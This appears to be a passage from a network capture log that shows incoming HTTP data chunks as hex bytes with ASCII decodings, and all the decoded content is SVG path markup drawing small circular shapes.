                                                                                                                                                                                                                                                                    2023-07-27 19:44:42 UTC196INData Raw: 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 39 2e 35 2c 32 39 32 2e 38 33 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 37 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 31 2c 32 2e 34 31 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 2f 3e 3c 70 61
                                                                                                                                                                                                                                                                    Data Ascii: 2,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.85"/><path class="cls-4" d="M879.5,292.83a1.72,1.72,0,0,1-.77,2.24,2.52,2.52,0,0,1-3.34-.94,2.41,2.41,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"/><pa
                                                                                                                                                                                                                                                                    2023-07-27 19:44:42 UTC212INData Raw: 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 33 2c 32 2e 31 33 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 31 30 2c 33 36 31 2e 32 31 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 33 2c 32 2e 31 33 2c 30 2c
                                                                                                                                                                                                                                                                    Data Ascii: ,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.13,2.13,0,0,1,.16,2.86"/><path class="cls-4" d="M910,361.21a1.73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.13,2.13,0,
                                                                                                                                                                                                                                                                    2023-07-27 19:44:42 UTC228INData Raw: 37 2e 31 37 2c 32 34 32 2e 36 33 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2d 33 2e 33 33 2d 2e 39 34 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 36 2e 39 34 2c 32 33 35 2e 37 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32
                                                                                                                                                                                                                                                                    Data Ascii: 7.17,242.63a1.72,1.72,0,0,1-.78,2.23,2.5,2.5,0,0,1-3.33-.94,2.37,2.37,0,0,1,.51-2.88,2.24,2.24,0,0,1,2.89,0,2.12,2.12,0,0,1,.16,2.86"/><path class="cls-4" d="M926.94,235.7a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.2
                                                                                                                                                                                                                                                                    2023-07-27 19:44:42 UTC244INData Raw: 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 32 37 2e 31 31 2c 31 37 30 2e 35 37 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30
                                                                                                                                                                                                                                                                    Data Ascii: 1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.38,2.38,0,0,1-.51,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.15-2.82"/><path class="cls-4" d="M1027.11,170.57a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.38,2.38,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,0
                                                                                                                                                                                                                                                                    2023-07-27 19:44:42 UTC260INData Raw: 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 31 30 2e 36 39 2c 33 30 31 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 32 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c
                                                                                                                                                                                                                                                                    Data Ascii: 1.7,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.81"/><path class="cls-4" d="M1010.69,301a1.7,1.7,0,0,1,.77-2.2,2.47,2.47,0,0,1,3.28.92,2.37,2.37,0,0,1-.5,2.85,2.22,2.22,0,0,1-2.85,0,2.09,2.09,
                                                                                                                                                                                                                                                                    2023-07-27 19:44:42 UTC276INData Raw: 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 38 30 2e 38 36 2c 32 34 30 2e 34 39 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 38 31 2e 30 39 2c 32 34 37 2e 33 32 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39
                                                                                                                                                                                                                                                                    Data Ascii: ,1-.16-2.81"/><path class="cls-4" d="M980.86,240.49a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.37,2.37,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,0,1-.15-2.81"/><path class="cls-4" d="M981.09,247.32a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.9
                                                                                                                                                                                                                                                                    2023-07-27 19:44:42 UTC292INData Raw: 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 35 31 2e 32 36 2c 31 38 36 2e 38 31 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d
                                                                                                                                                                                                                                                                    Data Ascii: .38,2.38,0,0,1-.51,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.15-2.82"/><path class="cls-4" d="M951.26,186.81a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.51,2.84,2.22,2.22,0,0,1-2.85,0,2.08,2.08,0,0,1-.15-2.81"/><path class="cls-4" d=
                                                                                                                                                                                                                                                                    2023-07-27 19:44:42 UTC308INData Raw: 2d 34 22 20 64 3d 22 4d 39 32 31 2e 34 33 2c 31 32 36 2e 32 39 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 39 2c 32 2e 34 39 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 41 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2c 39 32 32 2c 31 32 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 31 2e 36 37 2c 31 33 33 2e 31 32 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32
                                                                                                                                                                                                                                                                    Data Ascii: -4" d="M921.43,126.29a1.7,1.7,0,0,1,.77-2.2,2.49,2.49,0,0,1,3.29.93,2.37,2.37,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.86,0A2.09,2.09,0,0,1,922,125"/><path class="cls-4" d="M921.67,133.12a1.69,1.69,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.22
                                                                                                                                                                                                                                                                    2023-07-27 19:44:42 UTC324INData Raw: 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 30 35 2e 32 34 2c 32 36 33 2e 35 36 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 30 35 2e 34 37 2c 32 37 30 2e 33 39 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37
                                                                                                                                                                                                                                                                    Data Ascii: 1,0,0,1-2.85,0,2.09,2.09,0,0,1-.15-2.82"/><path class="cls-4" d="M905.24,263.56a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.38,2.38,0,0,1-.5,2.84,2.23,2.23,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.82"/><path class="cls-4" d="M905.47,270.39a1.7,1.7,0,0,1,.77
                                                                                                                                                                                                                                                                    2023-07-27 19:44:42 UTC340INData Raw: 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 32 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 35 2e 36 35 2c 32 30 39 2e 38 37 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 39 2c 32 2e 34 39 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31
                                                                                                                                                                                                                                                                    Data Ascii: 2.48,2.48,0,0,1,3.29.92,2.39,2.39,0,0,1-.5,2.85,2.23,2.23,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"/><path class="cls-4" d="M875.65,209.87a1.69,1.69,0,0,1,.76-2.2,2.49,2.49,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81
                                                                                                                                                                                                                                                                    2023-07-27 19:44:42 UTC356INData Raw: 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 34 35 2e 38 32 2c 31 34 39 2e 33 36 61 31 2e 36 38 2c 31 2e 36 38 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 34 36 2e 30 35 2c 31 35 36 2e 31 39 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33
                                                                                                                                                                                                                                                                    Data Ascii: ,0,1-.15-2.81"/><path class="cls-4" d="M845.82,149.36a1.68,1.68,0,0,1,.76-2.2,2.47,2.47,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.82"/><path class="cls-4" d="M846.05,156.19a1.69,1.69,0,0,1,.77-2.2,2.46,2.46,0,0,1,3
                                                                                                                                                                                                                                                                    2023-07-27 19:44:42 UTC372INData Raw: 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 32 39 2e 36 33 2c 32 38 36 2e 36 33 61 31 2e 36 38 2c 31 2e 36 38 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 32 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64
                                                                                                                                                                                                                                                                    Data Ascii: 2.36,2.36,0,0,1-.5,2.84,2.23,2.23,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"/><path class="cls-4" d="M829.63,286.63a1.68,1.68,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.92,2.37,2.37,0,0,1-.5,2.85,2.23,2.23,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"/><path class="cls-4" d
                                                                                                                                                                                                                                                                    2023-07-27 19:44:42 UTC388INData Raw: 31 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 30 30 2c 32 33 32 2e 39 34 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c
                                                                                                                                                                                                                                                                    Data Ascii: 1a1.7,1.7,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,0,1-.16-2.81"/><path class="cls-4" d="M800,232.94a1.7,1.7,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,
                                                                                                                                                                                                                                                                    2023-07-27 19:44:42 UTC404INData Raw: 35 2c 32 33 37 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 30 35 2c 32 32 39 2e 32 35 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e
                                                                                                                                                                                                                                                                    Data Ascii: 5,237a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.66,2.66,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.37,2.37,0,0,1,.18,3.18"/><path class="cls-7" d="M505,229.25a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.57-3.22,2.51,2.51,0,0,1,3.
                                                                                                                                                                                                                                                                    2023-07-27 19:44:42 UTC420INData Raw: 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 32 33 2e 38 31 2c 38 39 2e 35 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d
                                                                                                                                                                                                                                                                    Data Ascii: 71-1.05,2.66,2.66,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.37,2.37,0,0,1,.18,3.18"/><path class="cls-7" d="M523.81,89.56a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.57-3.22,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class=
                                                                                                                                                                                                                                                                    2023-07-27 19:44:42 UTC436INData Raw: 32 2e 36 37 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 35 37 2e 37 38 2c 31 36 35 2e 36 36 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35
                                                                                                                                                                                                                                                                    Data Ascii: 2.67,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.37,2.37,0,0,1,.18,3.18"/><path class="cls-7" d="M557.78,165.66a1.92,1.92,0,0,1-.87,2.49,2.8,2.8,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M5
                                                                                                                                                                                                                                                                    2023-07-27 19:44:42 UTC452INData Raw: 2e 32 32 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 39 31 2e 37 35 2c 32 34 31 2e 37 36 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 39 31 2e 34 39 2c 32 33 34 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c
                                                                                                                                                                                                                                                                    Data Ascii: .22,0,2.37,2.37,0,0,1,.18,3.18"/><path class="cls-7" d="M591.75,241.76a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.18,3.17"/><path class="cls-7" d="M591.49,234a1.92,1.92,0,0,1-.87,2.49,
